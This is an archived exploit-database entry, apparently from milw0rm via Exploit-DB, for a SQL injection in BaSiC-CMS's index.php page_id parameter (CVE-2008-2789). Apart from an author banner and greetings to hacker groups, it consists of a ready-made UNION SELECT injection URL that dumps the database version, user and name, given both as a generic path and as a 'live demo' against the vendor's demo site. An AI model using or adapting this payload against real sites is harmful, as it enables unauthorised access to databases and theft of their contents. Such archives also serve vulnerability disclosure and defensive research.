BaSiC-CMS index.php r Remote SQL Injection Vulnerability

2008-11-27T00:00:00
ID EDB-ID:7257
Type exploitdb
Reporter Mr.SQL
Modified 2008-11-27T00:00:00

Description

BaSiC-CMS (index.php r) Remote SQL Injection Vulnerability. CVE-2008-2789. Webapps exploit for php platform

                                        
                                            #########################################################################
#################### Viva IslaM Viva IslaM ##############################
##
## Remote SQL Injection Vulnerability
##
## BaSiC-CMS ( index.php r )
##
#########################################################################
#########################################################################
##
## AuTh0r : Mr.SQL
##
## H0ME   : WwW.PaL-HaCkEr.CoM
##
## Email  : SQL@Hotmail.it
##
## !! SYRIAN HaCkErS  !!
########################
########################
##
## Script : BaSiC-CMS
##
## site   : www.Basic-CMS.de
##
########################
########################
##
##     -(:: SQL ::)-
##
##    www.site.com/pages/
##          index.php?r=&page_id=-74+union+select+1,1,1,convert(concat_ws(0x2F2A2A2F,version(),current_user,database())+using+latin1),1,1--
##
##  -(:: L!VE DEMO ::)-
##
##    http://demo.basic-cms.de/pages/index.php?r=&page_id=-74+union+select+1,1,1,convert(concat_ws(0x2F2A2A2F,version(),current_user,database())+using+latin1),1,1--
##
#######################
#######################

#######################################################################################################
#######################################################################################################
                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
 :: HaCkEr-EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MusliMs HaCkErs ::
#######################################################################################################
#######################################################################################################

# milw0rm.com [2008-11-27]